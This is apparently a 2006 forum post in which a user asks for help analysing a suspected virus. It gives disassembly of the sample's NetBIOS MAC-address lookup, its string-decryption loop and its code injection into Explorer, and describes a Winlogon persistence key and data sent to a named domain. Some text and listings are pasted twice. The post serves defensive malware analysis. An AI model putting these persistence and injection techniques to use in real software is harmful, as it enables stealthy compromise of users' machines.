Tanmoy
August 19th, 2006, 07:22
hi, i was analyzing one program, and i came across a strange piece of code. i have no idea what it does, can some one tell me what it means.
netbios unclear
i suspect it is a virus, it copies it self to system32 directory, creates two copies by the name winkrnl.exe and dismgnt.exe, creates a registry key in
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
Userinit=C:\WINDOWS\system32\userinit.exe,C:\WINDOWS\system32\DisMgnt.exe
decrypte some api name code is
string decryption routine
creates two mutex, allocates memory in NTDLL and Explorer and copies some code to the remote process
and then creats remotethread and exits, it recedes in memory for rest of the period, if i try to delete it, it creates copies itself again in sys dir, removing reg key is also not useful because it writes reg key in every 10 sec. and it sends some data to www.luck4us.com
most amazing thing is it is not detected by anti-virus programs. if some want to analyze it further i can give it. to remove i had to use bert bootable cd. my question remains same what is the function of NetBios codes which i pasted in the beginning of my query.
thanks and regards.
netbios unclear
Code:
00402260 /$ 81EC 40010000 SUB ESP,140
00402266 |. 53 PUSH EBX ; kernel32.lstrcpyA
00402267 |. 56 PUSH ESI ; kernel32.7C800000
00402268 |. 57 PUSH EDI ; kernel32.GetProcAddress
00402269 |. B9 10000000 MOV ECX,10
0040226E |. 33C0 XOR EAX,EAX
00402270 |. 8D7C24 0C LEA EDI,DWORD PTR SS:[ESP+C]
00402274 |. F3:AB REP STOS DWORD PTR ES:[EDI]
00402276 |. 8D4C24 0C LEA ECX,DWORD PTR SS:[ESP+C]
0040227A |. 8D4424 4C LEA EAX,DWORD PTR SS:[ESP+4C]
0040227E |. 51 PUSH ECX ; kernel32.7C80C755
0040227F |. C64424 10 37 MOV BYTE PTR SS:[ESP+10],37
00402284 |. 894424 14 MOV DWORD PTR SS:[ESP+14],EAX
00402288 |. 66:C74424 18 0001 MOV WORD PTR SS:[ESP+18],100
0040228F |. E8 8C3B0000 CALL <JMP.&NETAPI32.Netbios>
00402294 |. 8B5C24 4D MOV EBX,DWORD PTR SS:[ESP+4D]
00402298 |. B9 10000000 MOV ECX,10
0040229D |. 33C0 XOR EAX,EAX
0040229F |. 8D7C24 0C LEA EDI,DWORD PTR SS:[ESP+C]
004022A3 |. 8D5424 0C LEA EDX,DWORD PTR SS:[ESP+C]
004022A7 |. 81E3 FF000000 AND EBX,0FF
004022AD |. F3:AB REP STOS DWORD PTR ES:[EDI]
004022AF |. 52 PUSH EDX
004022B0 |. C64424 10 32 MOV BYTE PTR SS:[ESP+10],32
004022B5 |. 885C24 40 MOV BYTE PTR SS:[ESP+40],BL
004022B9 |. E8 623B0000 CALL <JMP.&NETAPI32.Netbios>
004022BE |. B9 10000000 MOV ECX,10
004022C3 |. 33C0 XOR EAX,EAX
004022C5 |. 8D7C24 0C LEA EDI,DWORD PTR SS:[ESP+C]
004022C9 |. 8D5424 16 LEA EDX,DWORD PTR SS:[ESP+16]
004022CD |. F3:AB REP STOS DWORD PTR ES:[EDI]
004022CF |. BF C0C64000 MOV EDI,WinTask.0040C6C0
004022D4 |. 83C9 FF OR ECX,FFFFFFFF
004022D7 |. F2:AE REPNE SCAS BYTE PTR ES:[EDI]
004022D9 |. F7D1 NOT ECX ; kernel32.7C80C755
004022DB |. 2BF9 SUB EDI,ECX ; kernel32.7C80C755
004022DD |. C64424 0C 33 MOV BYTE PTR SS:[ESP+C],33
004022E2 |. 8BC1 MOV EAX,ECX ; kernel32.7C80C755
004022E4 |. 8BF7 MOV ESI,EDI ; kernel32.GetProcAddress
004022E6 |. 8BFA MOV EDI,EDX
004022E8 |. 885C24 3C MOV BYTE PTR SS:[ESP+3C],BL
004022EC |. C1E9 02 SHR ECX,2
004022EF |. F3:A5 REP MOVS DWORD PTR ES:[EDI],DWORD PTR DS:[ESI>
004022F1 |. 8BC8 MOV ECX,EAX
004022F3 |. 83E1 03 AND ECX,3
004022F6 |. F3:A4 REP MOVS BYTE PTR ES:[EDI],BYTE PTR DS:[ESI]
004022F8 |. 8D4C24 0C LEA ECX,DWORD PTR SS:[ESP+C]
004022FC |. C74424 10 18F14000 MOV DWORD PTR SS:[ESP+10],WinTask.0040F118
00402304 |. 51 PUSH ECX ; kernel32.7C80C755
00402305 |. 66:C74424 18 5802 MOV WORD PTR SS:[ESP+18],258
0040230C |. E8 0F3B0000 CALL <JMP.&NETAPI32.Netbios>
00402311 |. A1 1CF14000 MOV EAX,DWORD PTR DS:[40F11C]
00402316 |. 33D2 XOR EDX,EDX
00402318 |. 8AD4 MOV DL,AH
0040231A |. 25 FF000000 AND EAX,0FF
0040231F |. 52 PUSH EDX
00402320 |. 50 PUSH EAX
00402321 |. 33C0 XOR EAX,EAX
00402323 |. 33C9 XOR ECX,ECX ; kernel32.7C80C755
00402325 |. A0 1BF14000 MOV AL,BYTE PTR DS:[40F11B]
0040232A |. 8A0D 1AF14000 MOV CL,BYTE PTR DS:[40F11A]
00402330 |. 50 PUSH EAX
00402331 |. A1 18F14000 MOV EAX,DWORD PTR DS:[40F118]
00402336 |. 33D2 XOR EDX,EDX
00402338 |. 51 PUSH ECX ; kernel32.7C80C755
00402339 |. 8AD4 MOV DL,AH
0040233B |. 25 FF000000 AND EAX,0FF
00402340 |. 52 PUSH EDX
00402341 |. 50 PUSH EAX
00402342 |. 8B8424 68010000 MOV EAX,DWORD PTR SS:[ESP+168]
00402349 |. 68 ECC74000 PUSH WinTask.0040C7EC ; ASCII "%02X-%02X-%02X-%02X-%02X-%02X"
0040234E |. 50 PUSH EAX
0040234F |. E8 233C0000 CALL WinTask.00405F77
00402354 |. 83C4 20 ADD ESP,20
00402357 |. 5F POP EDI ; WinTask.0040170B
00402358 |. 5E POP ESI ; WinTask.0040170B
00402359 |. 5B POP EBX ; WinTask.0040170B
0040235A |. 81C4 40010000 ADD ESP,140
00402360 \. C2 0800 RETN 8
i suspect it is a virus, it copies it self to system32 directory, creates two copies by the name winkrnl.exe and dismgnt.exe, creates a registry key in
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
Userinit=C:\WINDOWS\system32\userinit.exe,C:\WINDOWS\system32\DisMgnt.exe
decrypte some api name code is
string decryption routine
Code:
00402620 /$ 8B4424 08 MOV EAX,DWORD PTR SS:[ESP+8] ; outstring ; WinTask.0040C048
00402624 |. 8B4C24 04 MOV ECX,DWORD PTR SS:[ESP+4] ; instring ; WinTask.0040C0D8
00402628 |. 53 PUSH EBX
00402629 |. 56 PUSH ESI
0040262A |. BE 08000000 MOV ESI,8 ; number loop
0040262F |> 8A11 /MOV DL,BYTE PTR DS:[ECX]
00402631 |. 8A18 |MOV BL,BYTE PTR DS:[EAX]
00402633 |. 2ADA |SUB BL,DL
00402635 |. 83C1 04 |ADD ECX,4
00402638 |. 8818 |MOV BYTE PTR DS:[EAX],BL
0040263A |. 8A51 FD |MOV DL,BYTE PTR DS:[ECX-3]
0040263D |. 8A58 01 |MOV BL,BYTE PTR DS:[EAX+1]
00402640 |. 83C0 02 |ADD EAX,2
00402643 |. 2ADA |SUB BL,DL
00402645 |. 4E |DEC ESI
00402646 |. 8858 FF |MOV BYTE PTR DS:[EAX-1],BL
00402649 |.^ 75 E4 \JNZ SHORT WinTask.0040262F
0040264B |. 5E POP ESI ; WinTask.00401057
0040264C |. 5B POP EBX ; WinTask.00401057
0040264D \. C2 0800 RETN 8
creates two mutex, allocates memory in NTDLL and Explorer and copies some code to the remote process
Code:
00401417 |. 8B3D 3CB04000 MOV EDI,DWORD PTR DS:[<&KERNEL32.CreateMutexA>; kernel32.CreateMutexA
0040141D |. 68 98C74000 PUSH WinTask.0040C798 ; /MutexName = "CMD"
00401422 |. 6A 00 PUSH 0 ; |InitialOwner = FALSE
00401424 |. 6A 00 PUSH 0 ; |pSecurity = NULL
00401426 |. FFD7 CALL NEAR EDI ; \CreateMutexA
00401428 |. 8B1D 38B04000 MOV EBX,DWORD PTR DS:[<&KERNEL32.GetLastError>; ntdll.RtlGetLastWin32Error
0040142E |. 8BF0 MOV ESI,EAX
00401430 |. FFD3 CALL NEAR EBX ; [GetLastError
00401432 |. 3D B7000000 CMP EAX,0B7
00401437 |. 56 PUSH ESI ; /hObject = 00342F30
00401438 |. 0F84 420C0000 JE WinTask.00402080 ; |
0040143E |. FF15 34B04000 CALL NEAR DWORD PTR DS:[<&KERNEL32.CloseHandl>; \CloseHandle
00401444 |. 68 90C74000 PUSH WinTask.0040C790 ; /MutexName = "MAIN"
00401449 |. 6A 00 PUSH 0 ; |InitialOwner = FALSE
0040144B |. 6A 00 PUSH 0 ; |pSecurity = NULL
0040144D |. FFD7 CALL NEAR EDI ; \CreateMutexA
0040144F |. 894424 28 MOV DWORD PTR SS:[ESP+28],EAX
00401453 |. FFD3 CALL NEAR EBX ; [GetLastError
00401455 |. 3D B7000000 CMP EAX,0B7
0040145A |. 0F84 260C0000 JE WinTask.00402086
00401460 |. E8 3B0C0000 CALL WinTask.004020A0 ; ** AdjustToken **
00401465 |> 68 74C74000 /PUSH WinTask.0040C774 ; /Arg1 = 0040C774
0040146A |. E8 C10C0000 |CALL WinTask.00402130 ; \** HeapAlloc in ntdll **
0040146F |. 68 88130000 |PUSH 1388 ; /Timeout = 5000. ms
00401474 |. 8BF0 |MOV ESI,EAX ; |
00401476 |. FF15 58B04000 |CALL NEAR DWORD PTR DS:[<&KERNEL32.Sleep>] ; \Sleep
0040147C |. 85F6 |TEST ESI,ESI
0040147E |.^ 76 E5 \JBE SHORT WinTask.00401465
00401480 |. 56 PUSH ESI ; /ProcessId = 342F30
00401481 |. 6A 00 PUSH 0 ; |Inheritable = FALSE
00401483 |. 68 FF0F1F00 PUSH 1F0FFF ; |Access = PROCESS_ALL_ACCESS
00401488 |. FF15 2CB04000 CALL NEAR DWORD PTR DS:[<&KERNEL32.OpenProces>; \OpenProcess
0040148E |. 8BF8 MOV EDI,EAX
00401490 |. 85FF TEST EDI,EDI ; kernel32.lstrcatA
00401492 |. 897C24 2C MOV DWORD PTR SS:[ESP+2C],EDI ; kernel32.lstrcatA
00401496 |. 0F84 EA0B0000 JE WinTask.00402086
0040149C |. 6A 40 PUSH 40
0040149E |. 68 00300000 PUSH 3000
004014A3 |. 68 00000200 PUSH 20000
004014A8 |. 6A 00 PUSH 0
004014AA |. 57 PUSH EDI ; kernel32.lstrcatA
004014AB |. FF15 28B04000 CALL NEAR DWORD PTR DS:[<&KERNEL32.VirtualAll>; kernel32.VirtualAllocEx
004014B1 |. 8BF0 MOV ESI,EAX
004014B3 |. 85F6 TEST ESI,ESI
004014B5 |. 897424 20 MOV DWORD PTR SS:[ESP+20],ESI
004014B9 |. 0F84 C70B0000 JE WinTask.00402086
004014BF |. 55 PUSH EBP
004014C0 |. 8D86 00F00000 LEA EAX,DWORD PTR DS:[ESI+F000]
004014C6 |. 8D8E 00400100 LEA ECX,DWORD PTR DS:[ESI+14000]
004014CC |. 6A 00 PUSH 0 ; /pOldProtect = NULL
004014CE |. 6A 40 PUSH 40 ; |NewProtect = PAGE_EXECUTE_READWRITE
004014D0 |. 894424 1C MOV DWORD PTR SS:[ESP+1C],EAX ; |
004014D4 |. 894C24 28 MOV DWORD PTR SS:[ESP+28],ECX ; |kernel32.7C839001
004014D8 |. 68 00900100 PUSH 19000 ; |Size = 19000 (102400.)
004014DD |. 8DAE 00A00000 LEA EBP,DWORD PTR DS:[ESI+A000] ; |
004014E3 |. 8D96 00900100 LEA EDX,DWORD PTR DS:[ESI+19000] ; |
004014E9 |. 8D86 00E00100 LEA EAX,DWORD PTR DS:[ESI+1E000] ; |
004014EF |. 8D8E 00F00100 LEA ECX,DWORD PTR DS:[ESI+1F000] ; |
004014F5 |. 56 PUSH ESI ; |Address = 00342F30
004014F6 |. 57 PUSH EDI ; |hProcess = 7C838FB9
004014F7 |. 8D9E 00500000 LEA EBX,DWORD PTR DS:[ESI+5000] ; |
004014FD |. 896C24 2C MOV DWORD PTR SS:[ESP+2C],EBP ; |
00401501 |. 895424 30 MOV DWORD PTR SS:[ESP+30],EDX ; |
00401505 |. 894424 24 MOV DWORD PTR SS:[ESP+24],EAX ; |
00401509 |. 894C24 3C MOV DWORD PTR SS:[ESP+3C],ECX ; |kernel32.7C839001
0040150D |. FF15 24B04000 CALL NEAR DWORD PTR DS:[<&KERNEL32.VirtualPro>; \VirtualProtectEx
00401513 |. 6A 00 PUSH 0 ; /pBytesWritten = NULL
00401515 |. 68 00500000 PUSH 5000 ; |BytesToWrite = 5000 (20480.)
0040151A |. 68 902A4000 PUSH WinTask.00402A90 ; |Buffer = WinTask.00402A90
0040151F |. 56 PUSH ESI ; |Address = 342F30
00401520 |. 8B35 20B04000 MOV ESI,DWORD PTR DS:[<&KERNEL32.WriteProcess>; |kernel32.WriteProcessMemory
00401526 |. 57 PUSH EDI ; |hProcess = 7C838FB9
00401527 |. FFD6 CALL NEAR ESI ; \WriteProcessMemory
00401529 |. 85C0 TEST EAX,EAX
0040152B |. 0F84 2F0B0000 JE WinTask.00402060
00401531 |. 6A 00 PUSH 0 ; /pBytesWritten = NULL
00401533 |. 68 00500000 PUSH 5000 ; |BytesToWrite = 5000 (20480.)
00401538 |. 68 D03B4000 PUSH WinTask.00403BD0 ; |Buffer = WinTask.00403BD0
0040153D |. 53 PUSH EBX ; |Address = 7C814C63
0040153E |. 57 PUSH EDI ; |hProcess = 7C838FB9
0040153F |. FFD6 CALL NEAR ESI ; \WriteProcessMemory
00401541 |. 85C0 TEST EAX,EAX
00401543 |. 0F84 170B0000 JE WinTask.00402060
and then creats remotethread and exits, it recedes in memory for rest of the period, if i try to delete it, it creates copies itself again in sys dir, removing reg key is also not useful because it writes reg key in every 10 sec. and it sends some data to www.luck4us.com
Code:
00401417 |. 8B3D 3CB04000 MOV EDI,DWORD PTR DS:[<&KERNEL32.CreateMutexA>; kernel32.CreateMutexA
0040141D |. 68 98C74000 PUSH WinTask.0040C798 ; /MutexName = "CMD"
00401422 |. 6A 00 PUSH 0 ; |InitialOwner = FALSE
00401424 |. 6A 00 PUSH 0 ; |pSecurity = NULL
00401426 |. FFD7 CALL NEAR EDI ; \CreateMutexA
00401428 |. 8B1D 38B04000 MOV EBX,DWORD PTR DS:[<&KERNEL32.GetLastError>; ntdll.RtlGetLastWin32Error
0040142E |. 8BF0 MOV ESI,EAX
00401430 |. FFD3 CALL NEAR EBX ; [GetLastError
00401432 |. 3D B7000000 CMP EAX,0B7
00401437 |. 56 PUSH ESI ; /hObject = 00342F30
00401438 |. 0F84 420C0000 JE WinTask.00402080 ; |
0040143E |. FF15 34B04000 CALL NEAR DWORD PTR DS:[<&KERNEL32.CloseHandl>; \CloseHandle
00401444 |. 68 90C74000 PUSH WinTask.0040C790 ; /MutexName = "MAIN"
00401449 |. 6A 00 PUSH 0 ; |InitialOwner = FALSE
0040144B |. 6A 00 PUSH 0 ; |pSecurity = NULL
0040144D |. FFD7 CALL NEAR EDI ; \CreateMutexA
0040144F |. 894424 28 MOV DWORD PTR SS:[ESP+28],EAX
00401453 |. FFD3 CALL NEAR EBX ; [GetLastError
00401455 |. 3D B7000000 CMP EAX,0B7
0040145A |. 0F84 260C0000 JE WinTask.00402086
00401460 |. E8 3B0C0000 CALL WinTask.004020A0 ; ** AdjustToken **
00401465 |> 68 74C74000 /PUSH WinTask.0040C774 ; /Arg1 = 0040C774
0040146A |. E8 C10C0000 |CALL WinTask.00402130 ; \** HeapAlloc in ntdll **
0040146F |. 68 88130000 |PUSH 1388 ; /Timeout = 5000. ms
00401474 |. 8BF0 |MOV ESI,EAX ; |
00401476 |. FF15 58B04000 |CALL NEAR DWORD PTR DS:[<&KERNEL32.Sleep>] ; \Sleep
0040147C |. 85F6 |TEST ESI,ESI
0040147E |.^ 76 E5 \JBE SHORT WinTask.00401465
00401480 |. 56 PUSH ESI ; /ProcessId = 342F30
00401481 |. 6A 00 PUSH 0 ; |Inheritable = FALSE
00401483 |. 68 FF0F1F00 PUSH 1F0FFF ; |Access = PROCESS_ALL_ACCESS
00401488 |. FF15 2CB04000 CALL NEAR DWORD PTR DS:[<&KERNEL32.OpenProces>; \OpenProcess
0040148E |. 8BF8 MOV EDI,EAX
00401490 |. 85FF TEST EDI,EDI ; kernel32.lstrcatA
00401492 |. 897C24 2C MOV DWORD PTR SS:[ESP+2C],EDI ; kernel32.lstrcatA
00401496 |. 0F84 EA0B0000 JE WinTask.00402086
0040149C |. 6A 40 PUSH 40
0040149E |. 68 00300000 PUSH 3000
004014A3 |. 68 00000200 PUSH 20000
004014A8 |. 6A 00 PUSH 0
004014AA |. 57 PUSH EDI ; kernel32.lstrcatA
004014AB |. FF15 28B04000 CALL NEAR DWORD PTR DS:[<&KERNEL32.VirtualAll>; kernel32.VirtualAllocEx
004014B1 |. 8BF0 MOV ESI,EAX
004014B3 |. 85F6 TEST ESI,ESI
004014B5 |. 897424 20 MOV DWORD PTR SS:[ESP+20],ESI
004014B9 |. 0F84 C70B0000 JE WinTask.00402086
004014BF |. 55 PUSH EBP
004014C0 |. 8D86 00F00000 LEA EAX,DWORD PTR DS:[ESI+F000]
004014C6 |. 8D8E 00400100 LEA ECX,DWORD PTR DS:[ESI+14000]
004014CC |. 6A 00 PUSH 0 ; /pOldProtect = NULL
004014CE |. 6A 40 PUSH 40 ; |NewProtect = PAGE_EXECUTE_READWRITE
004014D0 |. 894424 1C MOV DWORD PTR SS:[ESP+1C],EAX ; |
004014D4 |. 894C24 28 MOV DWORD PTR SS:[ESP+28],ECX ; |kernel32.7C839001
004014D8 |. 68 00900100 PUSH 19000 ; |Size = 19000 (102400.)
004014DD |. 8DAE 00A00000 LEA EBP,DWORD PTR DS:[ESI+A000] ; |
004014E3 |. 8D96 00900100 LEA EDX,DWORD PTR DS:[ESI+19000] ; |
004014E9 |. 8D86 00E00100 LEA EAX,DWORD PTR DS:[ESI+1E000] ; |
004014EF |. 8D8E 00F00100 LEA ECX,DWORD PTR DS:[ESI+1F000] ; |
004014F5 |. 56 PUSH ESI ; |Address = 00342F30
004014F6 |. 57 PUSH EDI ; |hProcess = 7C838FB9
004014F7 |. 8D9E 00500000 LEA EBX,DWORD PTR DS:[ESI+5000] ; |
004014FD |. 896C24 2C MOV DWORD PTR SS:[ESP+2C],EBP ; |
00401501 |. 895424 30 MOV DWORD PTR SS:[ESP+30],EDX ; |
00401505 |. 894424 24 MOV DWORD PTR SS:[ESP+24],EAX ; |
00401509 |. 894C24 3C MOV DWORD PTR SS:[ESP+3C],ECX ; |kernel32.7C839001
0040150D |. FF15 24B04000 CALL NEAR DWORD PTR DS:[<&KERNEL32.VirtualPro>; \VirtualProtectEx
00401513 |. 6A 00 PUSH 0 ; /pBytesWritten = NULL
00401515 |. 68 00500000 PUSH 5000 ; |BytesToWrite = 5000 (20480.)
0040151A |. 68 902A4000 PUSH WinTask.00402A90 ; |Buffer = WinTask.00402A90
0040151F |. 56 PUSH ESI ; |Address = 342F30
00401520 |. 8B35 20B04000 MOV ESI,DWORD PTR DS:[<&KERNEL32.WriteProcess>; |kernel32.WriteProcessMemory
00401526 |. 57 PUSH EDI ; |hProcess = 7C838FB9
00401527 |. FFD6 CALL NEAR ESI ; \WriteProcessMemory
00401529 |. 85C0 TEST EAX,EAX
0040152B |. 0F84 2F0B0000 JE WinTask.00402060
00401531 |. 6A 00 PUSH 0 ; /pBytesWritten = NULL
00401533 |. 68 00500000 PUSH 5000 ; |BytesToWrite = 5000 (20480.)
00401538 |. 68 D03B4000 PUSH WinTask.00403BD0 ; |Buffer = WinTask.00403BD0
0040153D |. 53 PUSH EBX ; |Address = 7C814C63
0040153E |. 57 PUSH EDI ; |hProcess = 7C838FB9
0040153F |. FFD6 CALL NEAR ESI ; \WriteProcessMemory
00401541 |. 85C0 TEST EAX,EAX
00401543 |. 0F84 170B0000 JE WinTask.00402060
most amazing thing is it is not detected by anti-virus programs. if some want to analyze it further i can give it. to remove i had to use bert bootable cd. my question remains same what is the function of NetBios codes which i pasted in the beginning of my query.
thanks and regards.
Kudos.